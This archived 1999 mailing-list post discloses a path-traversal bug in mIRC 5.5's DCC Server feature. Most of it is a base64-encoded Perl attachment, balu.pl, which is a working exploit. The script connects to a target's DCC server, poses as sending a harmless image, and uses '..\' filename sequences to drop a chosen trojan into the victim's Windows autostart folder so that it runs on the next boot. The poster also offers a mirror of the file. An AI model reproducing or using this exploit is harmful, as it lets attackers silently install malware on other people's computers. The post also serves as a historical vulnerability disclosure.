Mirc 5.5 'DCC Server' hole

From: Spikeman (spikemanat_private)
Date: Sun Jan 24 1999 - 08:44:54 PST

  • Next message: Casper Dik: "Re: NetBSD Security Advisory 1999-001: select(2)/accept(2) race"

      This message is in MIME format.  The first part should be readable text,
      while the remaining parts are likely unreadable without MIME-aware tools.
      Send mail to mimeat_private for more info.
    
    --1675104969-1444556010-917196294=:17684
    Content-Type: TEXT/PLAIN; charset=US-ASCII
    
    while talking with typo he gave me this mIRC bug as it says in the file
    # bug description: mirc 5.5's newly introduced dcc server feature doesn't
    # filter metachars(such as . and \) from sent filenames. this script
    fakes the
    # sending of a harmless file and then puts malicious file in a wanted
    # destination dir on the same harddrive (autostart dir is a good choice)
    
    If you have problems with the attchmnt i have the file at
    http://spikeman.genocide2600.com/balu.pl
    
          ___
         /\  \ Spikeman
        /::\  \
       /:/\:\  \ http://spikeman.genocide2600.com/
      _\:\~\:\  \ Spikeman's DoS Site
     /\ \:\ \:\__\
     \:\ \:\ \/__/ spikemanat_private
      \:\ \:\__\
       \:\/:/  /
        \::/  /
         \/__/
    
    --1675104969-1444556010-917196294=:17684
    Content-Type: TEXT/PLAIN; charset=US-ASCII; name="balu.pl"
    Content-Transfer-Encoding: BASE64
    Content-ID: <Pine.LNX.4.05.9901240844540.17684at_private>
    Content-Description:
    Content-Disposition: attachment; filename="balu.pl"
    
    IyEvdXNyL2Jpbi9wZXJsDQojIE1pcmMgNS41ICdEQ0MgU2VydmVyJyBwYXRo
    YnVnKGJhbHUpIHRvb2wuIC0gdHlwb0BpbmZlcm5vLnR1c2N1bHVtLmVkdQ0K
    Iw0KIyBidWcgZGVzY3JpcHRpb246IG1pcmMgNS41J3MgbmV3bHkgaW50cm9k
    dWNlZCBkY2Mgc2VydmVyIGZlYXR1cmUgZG9lc24ndA0KIyAgZmlsdGVyIG1l
    dGFjaGFycyhzdWNoIGFzIC4gYW5kIFwpIGZyb20gc2VudCBmaWxlbmFtZXMu
    IHRoaXMgc2NyaXB0IGZha2VzIHRoZQ0KIyAgc2VuZGluZyBvZiBhIGhhcm1s
    ZXNzIGZpbGUgYW5kIHRoZW4gcHV0cyBtYWxpY2lvdXMgZmlsZSBpbiBhIHdh
    bnRlZA0KIyAgZGVzdGluYXRpb24gZGlyIG9uIHRoZSBzYW1lIGhhcmRkcml2
    ZSAoYXV0b3N0YXJ0IGRpciBpcyBhIGdvb2QgY2hvaWNlKQ0KIw0KIyB1c2Fn
    ZTogLi9iYWx1LnBsIDxob3N0bmFtZT4gPChhbnkpbmljaz4gPGZpbGUvdHJv
    amFuIHRvIHNlbmQobG9jYWwpPiANCiMgICAgICAgICAgICAgICAgICA8ZmFr
    ZSBmaWxlbmFtZShpbWFnaW5hcnkpPiA8cGF0aCtmaWxlbmFtZSAocmVtb3Rl
    KT4NCiMNCiMNCg0KdXNlIElPOjpTb2NrZXQ7DQoNCiRob3N0ID0gc2hpZnQg
    b3IgZGllICduZWVkIGEgaG9zdCB0byBjb25uZWN0IHRvLic7IGNob21wICRo
    b3N0Ow0KJG5pY2sgPSBzaGlmdCBvciBkaWUgJ25lZWQgc291cmNlIG5pY2sg
    KGUuZy4gc2F0YW4pJzsgY2hvbXAgJG5pY2s7DQokZmlsZSA9IHNoaWZ0IG9y
    IGRpZSAnbmVlZCBhIGZpbGUgdG8gc2VuZCAoZWc6IC4vZXZpbC5leGUpLic7
    IGNob21wICRmaWxlOw0KJGZmaWxlID0gc2hpZnQgb3IgZGllICduZWVkIGEg
    ZmFrZSBmaWxlbmFtZSB0byBzZW5kIChlZzogdGVlbjUuanBnKS4nOyBjaG9t
    cCAkZmZpbGU7DQokcmZpbGUgPSBzaGlmdCBvciBkaWUgJ25lZWQgcmVtb3Rl
    IGZpbGVuYW1lK3BhdGgsIGVnKGluY2x1ZGluZyB0aGUgXCdcJ3MpOiBcJ3dp
    bmRvd3Ncc3RhcnRtfjFccHJvZ3JhfjFcYXV0b3N0YXJ0XGJsYS5leGVcJyAo
    d2hpY2ggaXMgdGhlIHBhdGggb2YgYXV0b3N0YXJ0IGluIGdlcm1hbiB3aW45
    NSknOw0KY2hvbXAgJHJmaWxlOw0KKCRkZXYsJGlubywkbW9kZSwkbmxpbmss
    JHVpZCwkZ2lkLCRyZGV2LCRzaXplLCRhdGltZSwkbXRpbWUsJGN0aW1lLCRi
    bGtzaXplLCRibG9ja3MpID0gc3RhdCgkZmlsZSk7DQokbXlzb2NrID0gSU86
    OlNvY2tldDo6SU5FVC0+bmV3KCIkaG9zdDo1OSIpIG9yIGRpZSAiY2FuJ3Qg
    Y29ubmVjdCB0byAkaG9zdDo1OSI7DQoNCiMkbXlzb2NrLT5zZW5kKCIxMDAg
    YmxhXG4iKTsNCmRlZmluZWQgJG15c29jayAtPiBzZW5kKCIxMjAgJG5pY2sg
    JHNpemUgJGZmaWxlIiAuICcgJyB4IDc0IC4gICdcLi5cLi5cLi5cLi5cLi5c
    XCcgLiAkcmZpbGUpOw0KDQpGT086IHdoaWxlIChkZWZpbmVkICRteXNvY2sp
    IHsNCiAgJG15c29jay0+cmVjdigkYmxhLDEpOw0KICBsYXN0IEZPTyBpZiAk
    YmxhIGVxICJcbiI7DQogICRmb28gLj0gJGJsYTsNCiAgZ290byBleGl0IGlm
    ICghZGVmaW5lZCAkbXlzb2NrKTsNCiAgZ290byBleGl0IGlmICghZGVmaW5l
    ZCAkYmxhKTsNCn0NCg0KKCRmMSwkZjIsJGYzKSA9IHNwbGl0KC8gLywkZm9v
    LCAzKTsNCnByaW50ICJOaWNrIG9mIHJlY2VpdmVyOiAkZjIgLSBSZXN1bWUg
    cmVxdWVzdGVkIGF0IG9mZnNldDogJGYzXG4iOw0KaWYgKCRmMyAhPSAwKSB7
    IHByaW50ICJFcnJvcjogJGYyIHdhbnRzIHRvIHJlc3VtZS4uIGFib3J0aW5n
    ISBUcnkgYW5vdGhlciByZW1vdGUgZmlsZW5hbWUuXG4iOyBnb3RvIGV4aXQ7
    IH0NCnByaW50ICJzZW5kaW5nLi4uICI7DQpvcGVuKEZJTEUsJGZpbGUpOw0K
    d2hpbGUgKDxGSUxFPikgew0KICAkbXlzb2NrLT5zZW5kKCRfKTsNCn0NCg0K
    ZXhpdDoNCnByaW50ICJkb25lLlxuIjsgDQokbXlzb2NrLT5jbG9zZTsNCg==
    --1675104969-1444556010-917196294=:17684--
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:30:27 PDT